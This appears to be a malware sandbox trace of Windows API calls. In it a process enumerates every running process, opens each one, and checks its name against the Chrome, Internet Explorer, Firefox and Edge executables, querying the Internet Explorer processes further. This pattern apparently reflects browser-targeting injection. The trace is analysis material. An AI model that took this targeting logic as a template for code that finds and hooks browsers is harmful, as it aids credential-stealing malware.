	[0216.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.107] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0216.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.107] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.108] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0216.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.108] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.109] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0216.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4748
	[0216.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.110] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0216.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.110] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.110] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0216.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.111] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.111] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0216.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x474c
	[0216.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.112] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0216.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.112] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.112] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0216.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.112] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.113] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0216.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4750
	[0216.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.113] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0216.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.114] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.114] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0216.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.114] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.115] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0216.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4754
	[0216.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.115] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0216.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.116] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.117] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0216.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.117] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.117] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0216.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4758
	[0216.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.118] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0216.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.118] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.119] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0216.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.119] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.119] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0216.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x475c
	[0216.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.120] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0216.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.120] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.121] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0216.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.121] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.121] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0216.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4760
	[0216.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.122] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0216.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.123] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.124] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0216.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.124] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.124] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0216.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4764
	[0216.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.125] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0216.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.125] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.126] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0216.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.126] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.126] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0216.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4768
	[0216.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.127] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0216.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.127] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.127] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0216.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.128] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.128] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0216.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x476c
	[0216.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.129] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0216.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.129] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.129] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0216.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.130] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.130] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0216.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4770
	[0216.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.131] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0216.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.132] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.132] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0216.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.133] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.133] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0216.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4774
	[0216.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.134] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0216.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.134] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.135] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0216.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.135] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.136] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0216.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4778
	[0216.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.136] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0216.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.137] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.138] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0216.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.138] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.140] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0216.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x477c
	[0216.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.141] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0216.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.141] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.142] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0216.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.142] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.142] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4780
	[0216.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.143] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.144] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.144] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.144] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.144] NtQueryInformationProcess (in: ProcessHandle=0x4780, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.145] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0216.145] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4784
	[0216.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.146] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0216.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.146] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0216.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.146] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0216.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.146] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.147] NtQueryInformationProcess (in: ProcessHandle=0x4784, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0216.147] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0216.147] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4788
	[0216.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.148] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.148] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.148] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.149] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.149] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0216.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x478c
	[0216.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.150] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0216.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.150] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.150] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0216.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.151] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.151] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4790
	[0216.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.152] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.152] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.152] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.153] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.153] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4794
	[0216.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.154] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.155] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.155] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.155] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.156] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0216.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4798
	[0216.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.156] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.157] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.157] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.157] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.158] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x479c
	[0216.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.158] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.159] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.159] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.159] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.159] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0216.160] CloseHandle (hObject=0x188) returned 1
	[0216.160] Sleep (dwMilliseconds=0x64) 
	[0216.270] GetCurrentProcessId () returned 0x110
	[0216.270] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0216.274] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0216.275] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0216.276] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
